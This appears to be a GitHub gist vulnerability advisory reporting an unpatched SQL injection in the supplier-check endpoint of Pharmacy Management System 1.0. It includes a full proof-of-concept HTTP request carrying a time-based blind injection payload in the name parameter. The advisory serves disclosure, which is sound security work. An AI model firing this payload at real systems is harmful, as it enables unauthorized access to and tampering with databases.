Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 16, 2024 21:35
Show Gist options
  • Save higordiego/26694ace59cbc1e1f8366bef96953569 to your computer and use it in GitHub Desktop.
Save higordiego/26694ace59cbc1e1f8366bef96953569 to your computer and use it in GitHub Desktop.

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/add_new_purchase.php?action=is_supplier&name=aaaa

Vulnerability Description:

A critical SQL injection vulnerability was identified in the Pharmacy Management System version 1.0, specifically in the supplier validation functionality when checking if a supplier is active (is_active). This flaw arises from improper sanitization of the name parameter, which is sent via a GET request to the endpoint /php/add_new_purchase.php?action=is_supplier. An attacker can exploit this flaw to inject and execute arbitrary SQL commands, compromising the security and integrity of the system's database.

This vulnerability poses a significant risk, as it can expose sensitive supplier information and disrupt operations by manipulating purchase flows. With no available patch, this flaw remains critical, requiring immediate attention to prevent data leaks, unauthorized access, or operational disruptions.


Proof of Concept (PoC):

Below is an example of a GET request that demonstrates how the SQL injection can be exploited through the name parameter:

GET /php/add_new_purchase.php?action=is_supplier&name=1'%20AND%20(SELECT%208790%20FROM%20(SELECT(SLEEP(5)))SaVV)--%20PPaK HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/add_purchase.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

Burp Suite Requests:

  • Burp Suite PoC

SQLMap Exploit:

  • SQLMap PoC

External Links:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment